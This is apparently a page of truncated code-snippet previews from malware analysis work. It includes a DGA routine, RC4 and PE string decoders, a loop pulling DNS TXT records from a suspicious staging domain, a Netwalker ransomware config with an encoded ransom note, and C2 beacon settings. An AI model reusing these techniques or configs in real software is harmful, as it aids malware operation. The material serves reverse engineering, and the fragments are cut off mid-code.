DGA code:
import java.util.Calendar;
import java.util.Random;
public class myTest {
private static long seed;
private static final int MAX_HOSTS = 2000;
private static void GetSeed(int m) {
int i = Calendar.getInstance().get(1);
import sys | |
import struct | |
magic = '\xfa\xff\xff\xff\x00\x00' | |
ver = 'le' | |
psize = 8 | |
def find_pclntab(data): | |
off = data.find(magic) |
import dns.resolver | |
c = '.stage.1950252.updates.updaternetworkmanagerr.com' | |
v = ord('a') | |
vv = ord('a') | |
vvv = ord('a') | |
done = False | |
out = "" | |
while not done: | |
t = dns.resolver.query(chr(v)+chr(vv)+chr(vvv)+c, 'TXT') |
DGA code:
import java.util.Calendar;
import java.util.Random;
public class myTest {
private static long seed;
private static final int MAX_HOSTS = 2000;
private static void GetSeed(int m) {
int i = Calendar.getInstance().get(1);
import sys | |
import pefile | |
import struct | |
def decode(data): | |
out = "" | |
for i in range(len(data)/2): | |
t1 = data[i*2] | |
t2 = data[(i*2)+1] | |
t1 &= 0xf0 |
def decode_data(data, key, sz): | |
S = list(range(sz)) | |
S = [x&0xff for x in S] | |
j = 0 | |
out = [] | |
for i in range(sz): | |
j = (j + S[i] + ord( key[i % len(key)] )) % sz | |
S[i] , S[j] = S[j] , S[i] | |
i = j = 0 | |
for char in data: |
import yara | |
rules = yara.compile(source='rule urls { strings: $a1 = /[0-9a-zA-Z_|]{6,}00000\d+/ ascii wide condition: all of them }') | |
def decoder(data): | |
matches = rules.match(data=data) | |
if matches != []: | |
matches = matches[0].strings |
Checking the expanded keys shows no difference | |
t2 uses thiefquests generate_xkey | |
>>> t2 | |
bytearray(b'\xcav33JX2tdnsedvwwraH6pryV0sd2mxC5uSlhUQCxGxGmxE3ThvKBO1wSh58X4K7CHs0c35btQk1Pr2jaxxfqmD0uISsMH1rowcrluv93hwdD1RgC6MT4q7y34VTL1l4B') | |
t uses a standard key expansion for RC2 | |
>>> t | |
bytearray(b'\xcav33JX2tdnsedvwwraH6pryV0sd2mxC5uSlhUQCxGxGmxE3ThvKBO1wSh58X4K7CHs0c35btQk1Pr2jaxxfqmD0uISsMH1rowcrluv93hwdD1RgC6MT4q7y34VTL1l4B') | |
{ | |
"lfile": "{id}-Readme.txt", | |
"spsz": 15360, | |
"lend": "SGkhDQpZb3VyIGZpbGVzIGFyZSBlbmNyeXB0ZWQgYnkgTmV0d2Fsa2VyLg0KQWxsIGVuY3J5cHRlZCBmaWxlcyBmb3IgdGhpcyBjb21wdXRlciBoYXMgZXh0ZW5zaW9uOiAue2lkfQ0KDQotLQ0KSWYgZm9yIHNvbWUgcmVhc29uIHlvdSByZWFkIHRoaXMgdGV4dCBiZWZvcmUgdGhlIGVuY3J5cHRpb24gZW5kZWQsDQp0aGlzIGNhbiBiZSB1bmRlcnN0b29kIGJ5IHRoZSBmYWN0IHRoYXQgdGhlIGNvbXB1dGVyIHNsb3dzIGRvd24sDQphbmQgeW91ciBoZWFydCByYXRlIGhhcyBpbmNyZWFzZWQgZHVlIHRvIHRoZSBhYmlsaXR5IHRvIHR1cm4gaXQgb2ZmLA0KdGhlbiB3ZSByZWNvbW1lbmQgdGhhdCB5b3UgbW92ZSBhd2F5IGZyb20gdGhlIGNvbXB1dGVyIGFuZCBhY2NlcHQgdGhhdCB5b3UgaGF2ZSBiZWVuIGNvbXByb21pc2VkLg0KUmVib290aW5nL3NodXRkb3duIHdpbGwgY2F1c2UgeW91IHRvIGxvc2UgZmlsZXMgd2l0aG91dCB0aGUgcG9zc2liaWxpdHkgb2YgcmVjb3ZlcnkuDQoNCi0tDQpPdXIgIGVuY3J5cHRpb24gYWxnb3JpdGhtcyBhcmUgdmVyeSBzdHJvbmcgYW5kIHlvdXIgZmlsZXMgYXJlIHZlcnkgd2VsbCBwcm90ZWN0ZWQsDQp0aGUgb25seSB3YXkgdG8gZ2V0IHlvdXIgZmlsZXMgYmFjayBpcyB0byBjb29wZXJhdGUgd2l0aCB1cyBhbmQgZ2V0IHRoZSBkZWNyeXB0ZXIgcHJvZ3JhbS4NCg0KRG8gbm90IHRyeSB0byByZWNvdmVyIHlvdXIgZmlsZXMgd2l0aG |
Pivot from config at https://twitter.com/VK_Intel/status/1260296104672886790 | |
{ | |
C2_CHUNK_POST: 0 | |
C2_POSTREQ: [('_HEADER', 0, 'Content-Type: application/octet-stream'), ('BUILD', ('PARAMETER', 'id'))] | |
C2_RECOVER: | |
C2_REQUEST: [('BUILD', ('BASE64', 'HEADER', 'Cookie'))] | |
C2_VERB_GET: GET | |
C2_VERB_POST: POST | |
CRYPTO_sCHEME: 1 |